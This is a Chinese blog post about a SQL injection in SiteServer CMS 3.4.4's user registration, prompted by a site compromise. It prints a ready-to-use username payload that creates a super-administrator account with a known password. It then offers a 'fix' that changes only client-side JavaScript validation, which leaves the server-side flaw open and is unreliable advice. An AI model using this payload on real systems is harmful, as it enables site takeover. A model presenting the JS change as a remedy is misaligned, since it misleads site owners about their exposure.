SiteServer 3.4.4 逻辑漏洞导致SQL注入及修复方法

最新推荐文章于 2024-04-17 10:55:18 发布
最新推荐文章于 2024-04-17 10:55:18 发布
阅读量1.1k 收藏
点赞数
分类专栏: 漏洞收集 文章标签: sql insert 数据库 cms function asp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/god_7z1/article/details/6989043
版权

今天特别发现SiteServe CMS( 3.4.4 )网站根目录多了一个asp文件,我就意识网站可以被挂马了!马上排查,终于在后台发现多了一个blue用户名的超级管理员。我猜想可能是SiteServe CMS系统有漏洞,上网一查,果然把到一堆“SiteServer 3.4.4 逻辑漏洞导致SQL注入”的文章。

---------------------------------------------------------------------------------------------------------------------------------------
SiteServer 3.4.4 逻辑漏洞导致SQL注入具体如下: 

问题出在UserCenter.Pages.DLL中的Register,注册流程逻辑有问题,具体如下:

 

1.程序先把用户名带入数据库中查询,如果用户名没有重复,进入第二步;

 

2.再在远程检测用户名中是否含有非法字符,如果没有,则进入第三步;

 

3.将新注册的用户插入数据库。 

由于在进行第一步的时候,程序没有进行任何处理就带入数据库中查询,那么就可以xxoo了。Orz。。。。

 

用户名填入以下语句,其他地方正常填写。

123');insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--

提交注册之后就往库里面插入了一个用户名为:blue 密码为:lanhai 的超级用户。
-------------------------------------------------------------------------------------------------------------------------------------
估计我后台的blue管理员就是这样来的。
我想主要是Js验证太简单了,改一下验证的Js文件就好了。

具体修复方法如下:

打开根目录下的UserCenter\js\signup_check2_data.js文件,把checkUserName函数改成:

checkUserName = function(value)
{
 var r1= new RegExp('[^A-Za-z0-9_-]',''); 

 $("username_msg").style.display = "none";
 $("usernamevalid_msg_succ").style.display = "none";
 $("usernamevalid_msg_error").style.display = "none";
 
 value = $('UserName').value;
 
 if ( !value || value.length == 0 )
 {
  $("username_msg").innerHTML = "用户名不能为空";
  $("username_msg").style.display = "";
  return false;
 }
 
 if ( value.length < 2 )
 {
  $("username_msg").innerHTML = '用户名长度不能小于2个字符';
  $("username_msg").style.display = "";
  return false;
 }
 else if( value.length > 18 )
 {
  $("username_msg").innerHTML = '用户名长度不大于18个字符';
  $("username_msg").style.display = "";
  return false;
 }
 else if( value.search(r1) >= 0)
 {
  $("username_msg").innerHTML = '用户名中含有非法字!';
  $("username_msg").style.display = "";
  return false;
 } 

 return true;
}

这样就可以限制用户名的长度,还有非法的字符!

就这样,这个漏洞就可以修复了。
当然果然你有更好的方法,可以拿出来分享一下!

7禧
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
NL2SQL进阶系列(3):Data-Copilot、Chat2DB、Vanna Text2SQL优化框架开源应用实践详解[Text2SQL]
丨汀、的博客
04-13 291
NL2SQL进阶系列(3):Data-Copilot、Chat2DB、Vanna Text2SQL优化框架开源应用实践详解[Text2SQL]
siteservercms 缺点_Siteserver CMS 远程模板下载Getshell漏洞
weixin_39576149的博客
01-30 1187
SiteServerCMS-Remote-download-Getshell-vulnerabilitySiteServerCMS 远程模板下载Getshell漏洞avatar漏洞缺陷是由于后台模板下载位置未对用户权限进行校验,且 ajaxOtherService中的downloadUrl参数可控,导致getshell,目前经过测试发现对5.0版本包含5.0以下通杀.先调用了DecryptStri...
74cmsSEv3.4.1存在任意文件读取漏洞(CVE-2022-26271)
qq_69432323的博客
07-23 175
74cmsSEv3.4.1存在任意文件读取漏洞
siteserver远程模板下载Getshell漏洞
Jiajiajiang_的博客
03-28 4187
此处不做分析,只做漏洞的复现。 参考:https://www.freebuf.com/articles/web/195105.html 准备工作: 需要一台公网服务器,一个有漏洞的站点(肯定的对8)。 第一步 先写一个马,此处是aspx站点,自然是aspx的马,但因为会有拦截等,所以构造如下的马。 <%@ Page Language="Jscript" Debug=true%&...
学习笔记-.net安全之SiteServer远程下载分析
人饭子的博客
11-07 460
0x00 简介 在N年前有个siteserver的远程getshell,其实这个洞很简单,问题出在下载模板这里。 找个低版本4.5左右的siteserver下载 0x01 漏洞成因 POC 192.168.110.129:8081/siteserver/Ajax/ajaxOtherService.aspx?type=SiteTemplateDownload&userKeyPrefix=h...
SiteServer CMS 0Day
p656456564545的专栏
01-09 2755
经测试秒杀最新的3.5版   EXP: 直接访问UserCenter/login.aspx 用户名处输入: 123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypte
siteserver cms 3.4.5+iis6.0 漏洞修复
weixin_34332905的博客
12-22 239
但是经过我本机测试发现只有xxx.asp的文件夹才能利用这个漏洞!此漏洞跟原来的漏洞 手法非常相似!满足两个条件 系统开放注册 iis6注册账户->文档附件管理->上传文件 我们新建一层目录 当然 之前是可以建立*.asp的目录 在3.4.5中已经过滤我们还是建立一层目录! 名字任意这个时候我们上传文件 结果发现 上传jp...
CMS知识小结及wordpress的安装与漏洞复现
人若有志,就不会在半坡停止。
09-11 2515
CMS是Content Management System的缩写,意为"内容管理系统",是一种帮助用户创建、管理和修改网站内容而无需专业技术知识的软件。内容管理系统是一种位于WEB 前端(Web服务器)和后端办公系统或流程(内容创作、编辑)之间的软件系统。内容的创作人员、编辑人员、发布人员使用内容管理系统来提交、修改、审批、发布内容。这里指的“内容”可能包括文件、表格、图片、数据库中的数据甚至视频等一切你想要发布到Internet、Intranet以及Extranet(外网)网站的信息。
SiteServer v3.4.4 for .net1.1.rar
07-08
系统安装时能够选择使用的数据库类型(SQLSERVER、ORACLE、ACCESS)及系统版本(标准版、专业版、全功能版)。 SiteServer 系列产品中任何一款产品(CMS、BBS、Ask、Space)均可单独安装,单独运行。 新增及完善...
SiteServer V3.4.4.rar
05-30
SiteServer V3.4.4.rar
SiteServer CMS 标准版(SQL Server)
12-13
SiteServer CMS 标准版(SQL Server)
SiteServer CMS 3.6.3 破解
07-11
SiteServer CMS 3.6.3版本,爆破,将BaiRong.Core.dll文件直接替换到bin目录即可,CMS测试通过,其他未测试,理论上都没有问题。仅用于测试,不可用于商业用途。
SiteServer CMS 5.0 安装包
02-05
官方提供的最新版本是SiteServer5.0安装包。本文是以全新安装SiteServer为例,所以需要下载安装包,注意不是升级包。 需要的小伙快来CSDN下载吧!
[CMS程序]SiteServer CMS v2.6.0 SQL版_siteservercmssql.zip源码ASP.NET网
05-18
[CMS程序]SiteServer CMS v2.6.0 SQL版_siteservercmssql.zip源码ASP.NET网[CMS程序]SiteServer CMS v2.6.0 SQL版_siteservercmssql.zip源码ASP.NET网[CMS程序]SiteServer CMS v2.6.0 SQL版_siteservercmssql.zip...
[CMS程序]SiteServer CMS 3.3.7 SQL版_siteservercmssql.zip源码ASP.NET网站
05-18
[CMS程序]SiteServer CMS 3.3.7 SQL版_siteservercmssql.zip源码ASP.NET网站[CMS程序]SiteServer CMS 3.3.7 SQL版_siteservercmssql.zip源码ASP.NET网站[CMS程序]SiteServer CMS 3.3.7 SQL版_siteservercmssql.zip...
sql基础(sql增删改)
2401_82760239的博客
04-12 301
修改id=1的行name为benben2,工资为3000(相当于同时修改两个内容)如果不加where就是所有的修改,加上where就可以指向明确的修改。#修改id=1的行的name为benben(where的限定语句)数据库是“按照数据结构来组织,存储和管理数据的仓库”#创建数据库employees并选择字符集。#选择进入数据库employees。#选择使用数据库security。#删除数据库employees。#创建数据表employee。#输入密码登录root用户。#修改所有工资为5000。
Win10安装sqlplus遇到报错的解决办法
huaqianzkh的专栏
04-11 227
然后到orcle官网下载了下载了一个64bit版本的sqlplus“instantclient-sqlplus-windows.x64-12.1.0.2.0.zip”安装包解压到本地, 如下图3所示。最近有用到sqlplus连接Oracle数据库执行自动化脚本,Orcle服务器版本是11.2.0.1。原来之前下的oci.dll就是32bit的客户端。所以这里的sqlplus.exe也要对应的是32bit的。解决办法:下载了一个32bit的sqlplus.exe,包含了oracle客户端的版本。
SQL表连接详解:JOIN与逗号(,)的使用及其性能影响
最新发布
好好学习日记
04-17 566
在这个详细的解释中,我们将深入探讨SQL中表连接的概念,特别是JOIN和逗号(,)在连接表时的不同用法及其对查询性能的影响。通过实际示例和背后的逻辑分析,我们将揭示在不同场景下选择哪种连接方式更为合适。
【网安小白成长之路】6.pikachu、sql-labs、upload-labs靶场搭建
菜菜的博客
04-11 6450
今天咱们学习的内容是搭建靶场,靶场在网络安全中,也是咱们必学的东西,靶场这个东西主要就是模拟真实环境,例如,老王的91网站存在某个漏洞,但是对于我们初学者,漏洞咋学,那就是通过靶场来练习,学习漏洞,咱们只要将靶场的漏洞学明白了,就可以去黑老王的91小网站了😍😍😍。
siteserver cmd
07-22
对不起,但我不能提供有关 Siteserver cmd 的任何信息或支持。Siteserver 是一个网站开发框架和内容管理系统,但我作为一个 AI 助手,并没有与 Siteserver 相关的功能或知识。如果您对 Siteserver cmd 有任何疑问或...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值